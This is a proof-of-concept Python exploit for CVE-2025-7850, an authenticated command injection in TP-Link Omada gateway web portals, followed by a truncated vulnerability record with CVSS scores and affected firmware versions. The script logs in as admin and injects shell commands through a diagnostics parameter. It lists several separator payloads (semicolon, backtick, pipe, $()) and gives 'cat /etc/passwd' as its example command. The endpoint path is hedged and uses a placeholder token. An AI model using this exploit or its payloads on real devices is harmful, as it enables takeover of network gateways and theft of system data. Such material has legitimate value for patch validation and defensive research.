CVE-2025-7850

# CVE-2025-7850 - Omada Gateway Command Injection PoC # Note: This PoC requires valid admin credentials for the Omada gateway web portal # The vulnerability allows authenticated admin users to inject OS commands # through insufficiently sanitized input fields in the web management interface. import requests import sys TARGET_URL = "https://<target-ip>:443" ADMIN_USER = "admin" ADMIN_PASS = "<admin_password>" def exploit_command_injection(target, username, password, cmd): """ Exploit command injection in Omada gateway web portal. Requires authenticated admin session. """ session = requests.Session() # Step 1: Authenticate to the web portal as admin login_url = f"{target}/cgi-bin/authLogin.cgi" login_data = { "username": username, "password": password } resp = session.post(login_url, data=login_data, verify=False) if resp.status_code != 200 or "error" in resp.text.lower(): print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Inject command via vulnerable parameter # The vulnerable endpoint typically processes diagnostic or config inputs # Example: ping/traceroute utilities or system configuration fields inject_url = f"{target}/cgi-bin/luci/;stok=<session_token>/admin/diagnostics" # Command injection payload - using command separator payload = { "command": f"127.0.0.1; {cmd}", # Alternative payloads: # "command": f"127.0.0.1`{cmd}`", # "command": f"127.0.0.1|{cmd}", # "command": f"127.0.0.1$({cmd})" } resp = session.post(inject_url, data=payload, verify=False) print(f"[+] Command executed: {cmd}") print(f"[+] Response status: {resp.status_code}") return True if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <command_to_execute>") print(f"Example: {sys.argv[0]} 'cat /etc/passwd'") sys.exit(1) cmd = sys.argv[1] exploit_command_injection(TARGET_URL, ADMIN_USER, ADMIN_PASS, cmd)

{"cve": {"id": "CVE-2025-7850", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2025-10-21T01:15:37.193", "lastModified": "2025-10-24T17:15:43.243", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability may be exploited after the admin's authentication on the web portal on Omada gateways."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er8411_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.3", "matchCriteriaId": "EE0D8327-33EE-4EF0-BC2F-F2A16D55762A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er8411_firmware:1.3.3:-:*:*:*:*:*:*", "matchCriteriaId": "6DB13EF6-0930-4575-92DC-AF431B2A2CEF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:er8411:-:*:*:*:*:*:*:*", "matchCriteriaId": "4F2F16D8-5D7B-4E01-8BB3-F324B6011F72"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er7412-m2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.0", "matchCriteriaId": "14CE8275-E546-4598-901C-F52355DED3C9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er7412-m2_firmware:1.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "B79E0763-6D6F-4E59-91FC-D397A8BEF0F1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:er7412-m2:-:*:*:*:*:*:*:*", "matchCriteriaId": "FBB89DAE-6264-4F26-B34A-E1B84FB927D4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er707-m2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.1", "matchCriteriaId": "48EDBC5B-BA54-4D11-9391-4FA7C7D4F5E7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er707-m2_firmware:1.3.1:-:*:*:*:*:*:*", "matchCriteriaId": "359ADA2C-F1A5-4840-8F84-2DBA8F4573C4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:er707-m2:-:*:*:*:*:*:*:*", "matchCriteriaId": "E45AF81F-1346-4FD8-9E38-CAB330D79AB6"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er7206_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.2", "matchCriteriaId": "AF595A8A-72CF-406E-BB0C-B76FDD51150B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er7206_firmware:2.2.2:-:*:*:*:*:*:*", "matchCriteriaId": "8F66B05E-0D03-4B59-BCA3-7A2F40F092EE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:er7206:-:*:*:*:*:*:*:*", "matchCriteriaId": "EB65324D-FD72-4C28-92AF-85BFF1E8A99 ... (truncated)